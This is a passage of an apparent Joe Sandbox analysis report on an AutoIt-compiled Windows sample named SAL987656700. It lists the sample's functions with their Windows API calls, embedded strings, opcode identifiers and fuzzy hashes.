                                      • Instruction Fuzzy Hash: FF21A8326216158BDB28CF79C81267A73E5F7A4310F15862EE4A7C37D0DE35A904DB40
                                      Function 01395738 Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2027392975.0000000001392000.00000040.00000020.00020000.00000000.sdmp, Offset: 01392000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1392000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                      • Instruction ID: e77b162469a7451a7301c3ad558c58314db8cafcb1e5dac9f32e878ac06b19d0
                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                      • Instruction Fuzzy Hash: 0E019278A01209EFCB45DF98C5909AEF7F6FB48314F20859AD809A7701D730AE81DB80
                                      Function 013956D8 Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2027392975.0000000001392000.00000040.00000020.00020000.00000000.sdmp, Offset: 01392000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1392000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                      • Instruction ID: 62d134a420a55e05882421f00421d9554e0efdd3308a167ee36c9111bdb613e1
                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                      • Instruction Fuzzy Hash: DB01A479A10209EFCB45DF98C5909AEF7F6FF48314F20859AD809A7701D730AE81DB80
                                      Function 01394098 Relevance: .0, Instructions: 6COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2027392975.0000000001392000.00000040.00000020.00020000.00000000.sdmp, Offset: 01392000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1392000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                      Function 00902ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteObject.GDI32(00000000), ref: 00902B30
                                      • DeleteObject.GDI32(00000000), ref: 00902B43
                                      • DestroyWindow.USER32 ref: 00902B52
                                      • GetDesktopWindow.USER32 ref: 00902B6D
                                      • GetWindowRect.USER32(00000000), ref: 00902B74
                                      • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00902CA3
                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00902CB1
                                      • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00902CF8
                                      • GetClientRect.USER32(00000000,?), ref: 00902D04
                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00902D40
                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00902D62
                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00902D75
                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00902D80
                                      • GlobalLock.KERNEL32(00000000), ref: 00902D89
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00902D98
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00902DA1
                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00902DA8
                                      • GlobalFree.KERNEL32(00000000), ref: 00902DB3
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00902DC5
                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,0091FC38,00000000), ref: 00902DDB
                                      • GlobalFree.KERNEL32(00000000), ref: 00902DEB
                                      • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00902E11
                                      • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00902E30
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00902E52
                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0090303F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                      • String ID: $AutoIt v3$DISPLAY$static
                                      • API String ID: 2211948467-2373415609
                                      • Opcode ID: 56627ab82b6e6682045d3bad4bb01a1ec704fed04b27aa16696485bf4e7b98e9
                                      • Instruction ID: 3a92252f3d114f5c7247408f115c7660afd44d09157ca8f07a364ba2acdeaf20
                                      • Opcode Fuzzy Hash: 56627ab82b6e6682045d3bad4bb01a1ec704fed04b27aa16696485bf4e7b98e9
                                      • Instruction Fuzzy Hash: B9028DB1610215AFDB14DF68CC89EAE7BB9FF49711F108558F915AB2A1C770ED00DB60
                                      Function 009170D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetTextColor.GDI32(?,00000000), ref: 0091712F
                                      • GetSysColorBrush.USER32(0000000F), ref: 00917160
                                      • GetSysColor.USER32(0000000F), ref: 0091716C
                                      • SetBkColor.GDI32(?,000000FF), ref: 00917186
                                      • SelectObject.GDI32(?,?), ref: 00917195
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 009171C0
                                      • GetSysColor.USER32(00000010), ref: 009171C8
                                      • CreateSolidBrush.GDI32(00000000), ref: 009171CF
                                      • FrameRect.USER32(?,?,00000000), ref: 009171DE
                                      • DeleteObject.GDI32(00000000), ref: 009171E5
                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00917230
                                      • FillRect.USER32(?,?,?), ref: 00917262
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00917284
                                        • Part of subcall function 009173E8: GetSysColor.USER32(00000012), ref: 00917421
                                        • Part of subcall function 009173E8: SetTextColor.GDI32(?,?), ref: 00917425
                                        • Part of subcall function 009173E8: GetSysColorBrush.USER32(0000000F), ref: 0091743B
                                        • Part of subcall function 009173E8: GetSysColor.USER32(0000000F), ref: 00917446
                                        • Part of subcall function 009173E8: GetSysColor.USER32(00000011), ref: 00917463
                                        • Part of subcall function 009173E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00917471
                                        • Part of subcall function 009173E8: SelectObject.GDI32(?,00000000), ref: 00917482
                                        • Part of subcall function 009173E8: SetBkColor.GDI32(?,00000000), ref: 0091748B
                                        • Part of subcall function 009173E8: SelectObject.GDI32(?,?), ref: 00917498
                                        • Part of subcall function 009173E8: InflateRect.USER32(?,000000FF,000000FF), ref: 009174B7
                                        • Part of subcall function 009173E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009174CE
                                        • Part of subcall function 009173E8: GetWindowLongW.USER32(00000000,000000F0), ref: 009174DB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                      • String ID:
                                      • API String ID: 4124339563-0
                                      • Opcode ID: 4b4f97fd49c66a320efccdbeb4d37e35a8d255f1c95ec937c222c9cf30d47c30
                                      • Instruction ID: c62c3c4f4660d8021658ceeb6f693491c985f686c2d7210ea60af0ff29e98433
                                      • Opcode Fuzzy Hash: 4b4f97fd49c66a320efccdbeb4d37e35a8d255f1c95ec937c222c9cf30d47c30
                                      • Instruction Fuzzy Hash: A7A1C1B225C306FFDB019FA0DC48A9BBBB9FB49320F104A19F962961E1D734E941DB51
                                      Function 00902711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(00000000), ref: 0090273E
                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0090286A
                                      • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 009028A9
                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 009028B9
                                      • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00902900
                                      • GetClientRect.USER32(00000000,?), ref: 0090290C
                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00902955
                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00902964
                                      • GetStockObject.GDI32(00000011), ref: 00902974
                                      • SelectObject.GDI32(00000000,00000000), ref: 00902978
                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00902988
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00902991
                                      • DeleteDC.GDI32(00000000), ref: 0090299A
                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 009029C6
                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 009029DD
                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00902A1D
                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00902A31
                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00902A42
                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00902A77
                                      • GetStockObject.GDI32(00000011), ref: 00902A82
                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00902A8D
                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00902A97
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                      • API String ID: 2910397461-517079104
                                      • Opcode ID: 292a5cee5a421ddd75a8b323a162546aff31626b9054f12e420dbe1215cf9da9
                                      • Instruction ID: 8b1c2195710239746f376810750c46dca1ae11c85ceda8475a8c23198c0c83ac
                                      • Opcode Fuzzy Hash: 292a5cee5a421ddd75a8b323a162546aff31626b9054f12e420dbe1215cf9da9
                                      • Instruction Fuzzy Hash: 1DB149B1A50215AFEB14DFA8CC89FAE7BA9FB48711F108114F914E72D0D770AD40CBA0
                                      Function 008F4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 008F4AED
                                      • GetDriveTypeW.KERNEL32(?,0091CB68,?,\\.\,0091CC08), ref: 008F4BCA
                                      • SetErrorMode.KERNEL32(00000000,0091CB68,?,\\.\,0091CC08), ref: 008F4D36
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DriveType
                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                      • API String ID: 2907320926-4222207086
                                      • Opcode ID: 6332743af314e4c8363e423ac5ddb396fa817bddd5e6b5de0d667593aed08e7c
                                      • Instruction ID: 4da985bf3ec1291cb17c83299b2b8039b5a19a054d34f676e9dcbbb9125b62ae
                                      • Opcode Fuzzy Hash: 6332743af314e4c8363e423ac5ddb396fa817bddd5e6b5de0d667593aed08e7c
                                      • Instruction Fuzzy Hash: 2C61B4B064520D9BCB14EF38C981D7A77A0FB86718B246017FA06EB292DB35DD41DB52
                                      Function 00898D85 Relevance: 40.7, APIs: 22, Strings: 1, Instructions: 480windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(?,?), ref: 00898E14
                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 008D6AC5
                                      • 6F540200.COMCTL32(?,000000FF,?), ref: 008D6AFE
                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 008D6F43
                                        • Part of subcall function 00898F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00898BE8,?,00000000,?,?,?,?,00898BBA,00000000,?), ref: 00898FC5
                                      • SendMessageW.USER32(?,00001053), ref: 008D6F7F
                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 008D6F96
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$DestroyF540200InvalidateMoveRect
                                      • String ID: 0
                                      • API String ID: 2339618693-4108050209
                                      • Opcode ID: cb6233843b5290e7075a1af595a6421878fb1bc14610ede1c97c9851d3d4d523
                                      • Instruction ID: f78f293986139fc5d130a5b689efd3b2d2d8ceb1c0ee4ade92f5a98ce9ed2438
                                      • Opcode Fuzzy Hash: cb6233843b5290e7075a1af595a6421878fb1bc14610ede1c97c9851d3d4d523
                                      • Instruction Fuzzy Hash: E712DE7020420ADFCB25DF28D864BA9B7E1FF45314F18866AF495CB261DB31EC61DB91
                                      Function 009173E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSysColor.USER32(00000012), ref: 00917421
                                      • SetTextColor.GDI32(?,?), ref: 00917425
                                      • GetSysColorBrush.USER32(0000000F), ref: 0091743B
                                      • GetSysColor.USER32(0000000F), ref: 00917446
                                      • CreateSolidBrush.GDI32(?), ref: 0091744B
                                      • GetSysColor.USER32(00000011), ref: 00917463
                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00917471
                                      • SelectObject.GDI32(?,00000000), ref: 00917482
                                      • SetBkColor.GDI32(?,00000000), ref: 0091748B
                                      • SelectObject.GDI32(?,?), ref: 00917498
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 009174B7
                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009174CE
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 009174DB
                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0091752A
                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00917554
                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00917572
                                      • DrawFocusRect.USER32(?,?), ref: 0091757D
                                      • GetSysColor.USER32(00000011), ref: 0091758E
                                      • SetTextColor.GDI32(?,00000000), ref: 00917596
                                      • DrawTextW.USER32(?,009170F5,000000FF,?,00000000), ref: 009175A8
                                      • SelectObject.GDI32(?,?), ref: 009175BF
                                      • DeleteObject.GDI32(?), ref: 009175CA
                                      • SelectObject.GDI32(?,?), ref: 009175D0
                                      • DeleteObject.GDI32(?), ref: 009175D5
                                      • SetTextColor.GDI32(?,?), ref: 009175DB
                                      • SetBkColor.GDI32(?,?), ref: 009175E5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                      • String ID:
                                      • API String ID: 1996641542-0
                                      • Opcode ID: f678fd4b1ffc489d1393e588e8410f918ffbdf771f978558673c544c1679fb51
                                      • Instruction ID: 86e7cb32a0c6f0783d2f501b2b33e2ce1df62cdac21847a168b75ffc73ba77c9
                                      • Opcode Fuzzy Hash: f678fd4b1ffc489d1393e588e8410f918ffbdf771f978558673c544c1679fb51
                                      • Instruction Fuzzy Hash: 2D6170B2A48219BFDF019FA4DC49EEEBF79EB08320F108115F911AB2A1D7749940DB90
                                      Function 00910FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 00911128
                                      • GetDesktopWindow.USER32 ref: 0091113D
                                      • GetWindowRect.USER32(00000000), ref: 00911144
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00911199
                                      • DestroyWindow.USER32(?), ref: 009111B9
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 009111ED
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0091120B
                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0091121D
                                      • SendMessageW.USER32(00000000,00000421,?,?), ref: 00911232
                                      • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00911245
                                      • IsWindowVisible.USER32(00000000), ref: 009112A1
                                      • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 009112BC
                                      • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 009112D0
                                      • GetWindowRect.USER32(00000000,?), ref: 009112E8
                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 0091130E
                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00911328
                                      • CopyRect.USER32(?,?), ref: 0091133F
                                      • SendMessageW.USER32(00000000,00000412,00000000), ref: 009113AA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                      • String ID: ($0$tooltips_class32
                                      • API String ID: 698492251-4156429822
                                      • Opcode ID: 84b27314f0e976f292008b986a251eae3ce80262ca99b42882797ac74e2c6d77
                                      • Instruction ID: 42d4628fdc94d2ca32cb0975e6dd5656f4560adbcb8ea24113a041cd9c854f99
                                      • Opcode Fuzzy Hash: 84b27314f0e976f292008b986a251eae3ce80262ca99b42882797ac74e2c6d77
                                      • Instruction Fuzzy Hash: 58B18071608345AFD714DF64C885BAEBBE4FF88750F00891CFA999B2A1C771E885CB52
                                      Function 00910241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 009102E5
                                      • _wcslen.LIBCMT ref: 0091031F
                                      • _wcslen.LIBCMT ref: 00910389
                                      • _wcslen.LIBCMT ref: 009103F1
                                      • _wcslen.LIBCMT ref: 00910475
                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 009104C5
                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00910504
                                        • Part of subcall function 0089F9F2: _wcslen.LIBCMT ref: 0089F9FD
                                        • Part of subcall function 008E223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008E2258
                                        • Part of subcall function 008E223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008E228A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                      • API String ID: 1103490817-719923060
                                      • Opcode ID: fd97e1309584ac347693ae7850085c4bd218b85e0eca7ea8924a3400055764ac
                                      • Instruction ID: f22b728feabdd49ab3340b0a0aa47f73e734ec410de351206009883a82f9e877
                                      • Opcode Fuzzy Hash: fd97e1309584ac347693ae7850085c4bd218b85e0eca7ea8924a3400055764ac
                                      • Instruction Fuzzy Hash: 56E1AE313082058FC724EF28C59086AB7EAFFC8754B144A5DF8969B3A1DB71ED85CB52
                                      Function 00898891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00898968
                                      • GetSystemMetrics.USER32(00000007), ref: 00898970
                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0089899B
                                      • GetSystemMetrics.USER32(00000008), ref: 008989A3
                                      • GetSystemMetrics.USER32(00000004), ref: 008989C8
                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 008989E5
                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 008989F5
                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00898A28
                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00898A3C
                                      • GetClientRect.USER32(00000000,000000FF), ref: 00898A5A
                                      • GetStockObject.GDI32(00000011), ref: 00898A76
                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00898A81
                                        • Part of subcall function 0089912D: GetCursorPos.USER32(?), ref: 00899141
